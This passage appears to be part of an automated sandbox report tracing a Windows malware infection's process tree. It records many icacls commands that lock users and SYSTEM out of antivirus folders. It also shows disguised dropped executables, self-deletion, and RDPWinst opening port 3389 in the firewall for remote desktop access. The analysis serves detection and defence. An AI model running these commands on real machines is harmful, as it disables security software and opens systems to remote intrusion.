                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                          2⤵
                                                                                                                                            PID:1032
                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                              icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                              3⤵
                                                                                                                                              • Modifies file permissions
                                                                                                                                              PID:1272
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
                                                                                                                                            2⤵
                                                                                                                                              PID:3932
                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                3⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:2120
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                              2⤵
                                                                                                                                                PID:3164
                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                  icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                  3⤵
                                                                                                                                                  • Modifies file permissions
                                                                                                                                                  PID:3460
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
                                                                                                                                                2⤵
                                                                                                                                                  PID:3012
                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies file permissions
                                                                                                                                                    PID:3936
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2428
                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies file permissions
                                                                                                                                                      PID:1304
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1748
                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                        icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
                                                                                                                                                        3⤵
                                                                                                                                                        • Modifies file permissions
                                                                                                                                                        PID:1880
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1316
                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                          icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                          3⤵
                                                                                                                                                          • Modifies file permissions
                                                                                                                                                          PID:4036
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
      2⤵
      PID:2640
        • C:\Windows\SysWOW64\icacls.exe
          icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:948
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      2⤵
      PID:3492
        • C:\Windows\SysWOW64\icacls.exe
          icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:3472
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
      2⤵
      PID:1832
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:1932
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      2⤵
      PID:2232
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:1476
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
      2⤵
      PID:3904
        • C:\Windows\SysWOW64\icacls.exe
          icacls c:\programdata\Malwarebytes /deny Admin:(F)
          3⤵
          • Modifies file permissions
          PID:2020
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
      2⤵
      PID:2588
        • C:\Windows\SysWOW64\icacls.exe
          icacls c:\programdata\Malwarebytes /deny System:(F)
          3⤵
          • Modifies file permissions
          PID:2984
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
      2⤵
      PID:2960
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Programdata\MB3Install /deny Admin:(F)
          3⤵
          • Modifies file permissions
          PID:3980
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
      2⤵
      PID:3280
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Programdata\MB3Install /deny System:(F)
          3⤵
          • Modifies file permissions
          PID:808
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
      2⤵
      PID:3356
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:1284
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      2⤵
      PID:4000
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:3308
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
      2⤵
      PID:1448
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:1956
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
      2⤵
      PID:1760
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:3480
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
      2⤵
      PID:2908
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:2156
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      2⤵
      PID:3248
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:2172
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
      2⤵
      PID:2404
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:1336
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
      2⤵
      PID:2152
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:3524
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
      2⤵
      PID:3916
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:1384
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
      2⤵
      PID:2220
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:2200
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
      2⤵
      PID:4132
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:4188
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
      2⤵
      PID:4216
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
          3⤵
          • Modifies file permissions
          PID:4260
    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4280
                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                    PID:4360
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4420
                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                      icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:4464
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4512
                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                        icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                        PID:4556
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4576
                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                          icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                          PID:4620
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4656
                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                            icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                            PID:4748
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4776
                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                              icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                              PID:4820
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4840
                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                PID:4884
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4904
                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                  icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                  PID:4948
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4968
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                    PID:5012
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5064
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                      PID:4312
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:4292
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                        PID:4452
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:4604
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                          icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                          PID:4700
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:4724
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                            icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                            PID:4808
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    2⤵
      PID:4788
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
        3⤵
        • Modifies file permissions
        PID:4864
  • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    2⤵
      PID:4920
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        3⤵
        • Modifies file permissions
        PID:4924
  • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
    2⤵
      PID:5020
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
        3⤵
        • Modifies file permissions
        PID:4980
  • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
    2⤵
      PID:5048
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
        3⤵
        • Modifies file permissions
        PID:5100
  • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
    2⤵
      PID:4112
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
        3⤵
        • Modifies file permissions
        PID:4108
  • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
    2⤵
      PID:4124
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
        3⤵
        • Modifies file permissions
        PID:4144
  • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
    2⤵
      PID:4264
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
        3⤵
        • Modifies file permissions
        PID:4296
  • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
    2⤵
      PID:3584
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
        3⤵
        • Modifies file permissions
        PID:4444
  • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
    2⤵
      PID:4368
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
        3⤵
        • Modifies file permissions
        PID:4472
  • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
    2⤵
      PID:4552
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
        3⤵
        • Modifies file permissions
        PID:4580
  • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
    2⤵
      PID:4600
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
        3⤵
        • Modifies file permissions
        PID:4544
  • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    2⤵
      PID:4800
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        3⤵
        • Modifies file permissions
        PID:4784
  • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
    2⤵
      PID:4848
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
        3⤵
        • Modifies file permissions
        PID:4940
  • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    2⤵
      PID:4928
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        3⤵
        • Modifies file permissions
        PID:5072
  • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
    2⤵
      PID:4104
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
        3⤵
        • Modifies file permissions
        PID:4416
  • C:\Programdata\Install\utorrent.exe
    C:\Programdata\Install\utorrent.exe
    2⤵
    • Executes dropped EXE
                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                        • NTFS ADS
                                                                                                                                                                                                                                                        PID:2940
                                                                                                                                                                                                                                                        • C:\ProgramData\WindowsTask\azur.exe
                                                                                                                                                                                                                                                          C:\ProgramData\WindowsTask\azur.exe
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                          PID:4212
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:4404
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\timeout.exe 3
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                PID:5088
                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsTask\system.exe
                                                                                                                                                                                                                                                            C:\ProgramData\WindowsTask\system.exe
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                            PID:4988
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\selfDel.bat" "
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:2660
                                                                                                                                                                                                                                                            • C:\ProgramData\RDPWinst.exe
                                                                                                                                                                                                                                                              C:\ProgramData\RDPWinst.exe -u
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                              PID:4468
                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                                                                                                                                                                netsh advfirewall firewall delete rule name="Remote Desktop"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:5024
                                                                                                                                                                                                                                                              • C:\ProgramData\RDPWinst.exe
                                                                                                                                                                                                                                                                C:\ProgramData\RDPWinst.exe -i
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Modifies WinLogon
                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                PID:4836
                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                                                                                                                                                                  netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:5108
                                                                                                                                                                                                                                                            • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                              C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                              PID:3752
                                                                                                                                                                                                                                                            • C:\Programdata\RealtekHD\taskhost.exe
                                                                                                                                                                                                                                                              C:\Programdata\RealtekHD\taskhost.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                              PID:4484
                                                                                                                                                                                                                                                              • C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                                                                                                                                                C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                PID:4432
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /C schtasks /query /fo list
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:4560
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks /query /fo list
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:4624
                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ipconfig /flushdns
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:4380
                                                                                                                                                                                                                                                                      • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                                                                                                                        ipconfig /flushdns
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Gathers network information
                                                                                                                                                                                                                                                                        PID:4424
                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c gpupdate /force
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:4592
                                                                                                                                                                                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                          gpupdate /force
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:4836
                                                                                                                                                                                                                                                                        • C:\ProgramData\WindowsTask\audiodg.exe
                                                                                                                                                                                                                                                                          C:\ProgramData\WindowsTask\audiodg.exe
      2⤵
      • Executes dropped EXE
      PID:4396
